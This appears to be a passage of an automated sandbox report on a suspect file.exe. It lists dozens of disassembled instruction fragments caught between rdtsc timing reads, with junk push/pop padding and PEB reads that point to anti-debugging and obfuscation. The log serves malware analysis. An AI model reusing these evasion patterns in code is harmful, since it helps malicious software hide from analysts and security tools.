Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 190A281 second address: 190A2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FC69CFD56F9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 190A2A3 second address: 190A2B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69D5338FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191A999 second address: 191A99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191A99D second address: 191A9A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 191EB4E second address: 191EB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2424 second address: 19E2439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC69D5338FAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2439 second address: 19E2452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC69CFD56E6h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 je 00007FC69CFD56EEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2614 second address: 19E262B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007FC69D5338FFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E262B second address: 19E2637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2637 second address: 19E2686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC69D533907h 0x00000014 jmp 00007FC69D533908h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jnc 00007FC69D5338F6h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2818 second address: 19E2820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2820 second address: 19E2824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2824 second address: 19E283F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2AC9 second address: 19E2ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2ACF second address: 19E2AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FC69CFD56EEh 0x0000000d jo 00007FC69CFD56E6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2AEC second address: 19E2B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69D5338FDh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E2B03 second address: 19E2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E7569 second address: 19E756D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E756D second address: 19E75AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CFD56F0h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 jmp 00007FC69CFD56F3h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC69CFD56EBh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E77AD second address: 19E77B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E77B3 second address: 19E77B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E78A0 second address: 19E78A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E78A4 second address: 19E78AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E937A second address: 19E9395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E9395 second address: 19E93AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FC69CFD56E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E8F3D second address: 19E8F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69D5338FEh 0x00000009 jc 00007FC69D5338F6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19E8F56 second address: 19E8F7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC69CFD56F0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19EAED9 second address: 19EAEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 19EAEDD second address: 19EAEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540011 second address: 754007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69D533907h 0x00000009 sbb esi, 30F8C6DEh 0x0000000f jmp 00007FC69D533909h 0x00000014 popfd 0x00000015 call 00007FC69D533900h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC69D533908h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754007D second address: 7540083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540083 second address: 75400B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC69D533902h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC69D5338FAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400B2 second address: 75400C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400C1 second address: 75400EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 80h 0x00000005 call 00007FC69D533900h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, 66D3C079h 0x0000001c push eax 0x0000001d pop ebx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75400EB second address: 7540127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov ax, B9E9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub esp, 18h 0x00000010 jmp 00007FC69CFD56F4h 0x00000015 xchg eax, ebx 0x00000016 jmp 00007FC69CFD56F0h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540127 second address: 754012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754012B second address: 754012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754012F second address: 7540135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540135 second address: 754017B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FC69CFD56F6h 0x0000000f mov ebx, dword ptr [eax+10h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC69CFD56F7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754017B second address: 7540181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540181 second address: 7540275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FC69CFD56F6h 0x00000011 push eax 0x00000012 jmp 00007FC69CFD56EBh 0x00000017 xchg eax, esi 0x00000018 jmp 00007FC69CFD56F6h 0x0000001d mov esi, dword ptr [74E806ECh] 0x00000023 pushad 0x00000024 mov ebx, eax 0x00000026 jmp 00007FC69CFD56EAh 0x0000002b popad 0x0000002c test esi, esi 0x0000002e jmp 00007FC69CFD56F0h 0x00000033 jne 00007FC69CFD6630h 0x00000039 jmp 00007FC69CFD56F0h 0x0000003e xchg eax, edi 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC69CFD56EEh 0x00000046 add cx, F358h 0x0000004b jmp 00007FC69CFD56EBh 0x00000050 popfd 0x00000051 jmp 00007FC69CFD56F8h 0x00000056 popad 0x00000057 push eax 0x00000058 jmp 00007FC69CFD56EBh 0x0000005d xchg eax, edi 0x0000005e jmp 00007FC69CFD56F6h 0x00000063 call dword ptr [74E50B60h] 0x00000069 mov eax, 750BE5E0h 0x0000006e ret 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 mov esi, 06D223CFh 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540275 second address: 754027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754027B second address: 754027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754027F second address: 75402DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d pushad 0x0000000e mov dl, al 0x00000010 pushfd 0x00000011 jmp 00007FC69D533901h 0x00000016 add ax, FB16h 0x0000001b jmp 00007FC69D533901h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC69D5338FDh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75402DB second address: 75403A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CFD56EAh 0x00000009 add ax, AE68h 0x0000000e jmp 00007FC69CFD56EBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC69CFD56F6h 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC69CFD56F1h 0x00000025 and si, CF36h 0x0000002a jmp 00007FC69CFD56F1h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007FC69CFD56F0h 0x00000036 xor ah, 00000058h 0x00000039 jmp 00007FC69CFD56EBh 0x0000003e popfd 0x0000003f popad 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 mov edx, eax 0x00000044 call 00007FC69CFD56F0h 0x00000049 call 00007FC69CFD56F2h 0x0000004e pop esi 0x0000004f pop edx 0x00000050 popad 0x00000051 push dword ptr [eax] 0x00000053 jmp 00007FC69CFD56EEh 0x00000058 mov eax, dword ptr fs:[00000030h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403A5 second address: 75403C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403C2 second address: 75403DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 05C56C89h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC69CFD56EBh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75403FC second address: 7540400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540400 second address: 7540406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540406 second address: 754043E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, ch 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edi, ecx 0x00000011 pushfd 0x00000012 jmp 00007FC69D533904h 0x00000017 adc cx, 1498h 0x0000001c jmp 00007FC69D5338FBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754043E second address: 7540444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540444 second address: 7540448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540448 second address: 754044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754044C second address: 7540487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC69D533907h 0x0000000f je 00007FC70ADF2B31h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC69D533900h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540487 second address: 754048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754048B second address: 7540491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540491 second address: 75404A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub eax, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404A3 second address: 75404A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404A7 second address: 75404AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404AB second address: 75404B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404B1 second address: 75404C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404C9 second address: 75404CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404CD second address: 75404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC69CFD56F9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404F4 second address: 75404FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75404FA second address: 7540548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FC69CFD56F0h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 pushad 0x00000015 call 00007FC69CFD56EEh 0x0000001a mov ax, 1631h 0x0000001e pop ecx 0x0000001f mov ebx, 57F5A8A2h 0x00000024 popad 0x00000025 mov dword ptr [esi+0Ch], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d mov esi, 61066787h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540548 second address: 754058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007FC69D533904h 0x0000000c sub si, 5468h 0x00000011 jmp 00007FC69D5338FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+4Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC69D533900h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754058E second address: 7540592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540592 second address: 7540598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540598 second address: 75405B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FCE3h 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+10h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC69CFD56EDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405B9 second address: 75405BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405BD second address: 75405C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75405C3 second address: 7540600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 9C79h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+50h] 0x0000000d pushad 0x0000000e pushad 0x0000000f mov di, A622h 0x00000013 call 00007FC69D533903h 0x00000018 pop esi 0x00000019 popad 0x0000001a movsx edi, cx 0x0000001d popad 0x0000001e mov dword ptr [esi+14h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC69D5338FAh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540600 second address: 7540606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540606 second address: 754060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 754060C second address: 7540610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7540610 second address: 75406C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC69D533902h 0x00000012 and eax, 330E5048h 0x00000018 jmp 00007FC69D5338FBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC69D533908h 0x00000024 xor ax, 92A8h 0x00000029 jmp 00007FC69D5338FBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [esi+18h], eax 0x00000033 jmp 00007FC69D533906h 0x00000038 mov eax, dword ptr [ebx+58h] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007FC69D533903h 0x00000046 or si, 654Eh 0x0000004b jmp 00007FC69D533909h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75406C1 second address: 754072B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f pushad 0x00000010 call 00007FC69CFD56F6h 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FC69CFD56EBh 0x0000001c or ecx, 1C7E98BEh 0x00000022 jmp 00007FC69CFD56F9h 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+5Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F003C second address: 74F005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F005B second address: 74F005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F005F second address: 74F0065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0065 second address: 74F009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CFD56F2h 0x00000009 adc ax, 6B08h 0x0000000e jmp 00007FC69CFD56EBh 0x00000013 popfd 0x00000014 mov ecx, 41BFAD7Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
